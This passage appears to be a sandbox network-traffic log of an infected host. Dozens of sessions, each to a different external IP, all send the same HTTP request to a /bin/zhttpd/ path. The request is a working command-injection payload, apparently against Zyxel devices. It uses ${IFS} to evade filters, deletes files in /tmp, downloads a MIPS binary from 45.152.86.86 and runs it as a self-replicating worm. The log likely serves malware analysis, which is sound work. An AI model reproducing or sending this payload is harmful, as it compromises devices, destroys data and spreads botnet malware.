                              Mar 31, 2024 08:41:45.077824116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6294192.168.2.1339610207.80.130.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077873945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6295192.168.2.1357860159.29.189.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077953100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6296192.168.2.133321818.165.107.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.077989101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6297192.168.2.134882450.131.134.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078054905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6298192.168.2.135438231.7.64.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078147888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6299192.168.2.133582687.121.72.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078191042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6300192.168.2.1349622161.187.140.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078263044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6301192.168.2.1351476157.78.22.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078318119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6302192.168.2.1342520191.173.186.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078387976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6303192.168.2.133492246.44.200.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078464031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6304192.168.2.1355426181.250.33.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078525066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6305192.168.2.1354462168.29.66.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078573942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6306192.168.2.134866451.241.42.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078664064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6307192.168.2.134948683.24.174.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078721046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6308192.168.2.135957057.251.63.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078814983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6309192.168.2.1349824114.216.0.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078854084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6310192.168.2.1346432196.173.245.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078922033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6311192.168.2.134111417.138.13.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.078999996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6312192.168.2.133476492.163.188.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079050064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6313192.168.2.1357268147.170.45.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079123974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6314192.168.2.133407636.237.154.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079195976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6315192.168.2.135036249.101.201.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079253912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6316192.168.2.133778014.184.103.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079322100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6317192.168.2.1337544210.107.161.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079390049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6318192.168.2.1345876138.153.16.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079463959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6319192.168.2.1346124212.221.50.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079544067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6320192.168.2.1338266180.189.200.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079588890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6321192.168.2.133689435.173.99.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079682112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6322192.168.2.134550670.98.88.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079741001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6323192.168.2.134363495.96.63.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079793930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6324192.168.2.1340814153.113.163.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079862118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6325192.168.2.1340068172.243.13.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.079938889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6326192.168.2.134665854.221.162.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080003023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6327192.168.2.1345108151.20.51.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080082893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6328192.168.2.1341816177.65.33.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080146074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6329192.168.2.134099497.102.11.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080228090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6330192.168.2.1335038149.132.60.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080287933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6331192.168.2.1350620150.64.141.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080363989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6332192.168.2.134546847.141.178.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080409050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6333192.168.2.1335720222.136.38.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080492020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6334192.168.2.1337662144.194.91.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080555916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6335192.168.2.13567702.225.229.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080599070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6336192.168.2.1334442130.112.165.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080666065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6337192.168.2.1356788201.135.22.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080720901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6338192.168.2.13466605.117.223.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080794096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6339192.168.2.134928424.43.200.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080862999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6340192.168.2.134637625.135.105.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080916882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6341192.168.2.133708099.112.63.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.080981016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6342192.168.2.1340574117.194.61.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081043959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6343192.168.2.133765878.105.59.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081130028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6344192.168.2.135592014.189.215.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081183910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6345192.168.2.134147284.174.231.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081254959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6346192.168.2.1335680194.127.179.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081309080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6347192.168.2.1339334112.166.186.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081391096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6348192.168.2.135547650.197.30.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081458092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6349192.168.2.135768012.216.142.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081523895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6350192.168.2.134338866.20.176.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081553936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6351192.168.2.135874051.34.80.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081609011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6352192.168.2.1357568210.61.151.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081696987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6353192.168.2.1349960217.125.128.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081774950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6354192.168.2.135765067.217.146.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081846952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6355192.168.2.134343063.62.112.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081901073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6356192.168.2.1354836125.172.115.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.081975937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6357192.168.2.1335184151.232.154.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082071066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6358192.168.2.1358606106.15.57.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082112074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6359192.168.2.134584439.104.65.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082190990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6360192.168.2.1347794162.191.161.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082267046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6361192.168.2.1354434180.213.184.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.082319975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6362192.168.2.1343422160.34.154.208443
                              TimestampBytes transferredDirectionData
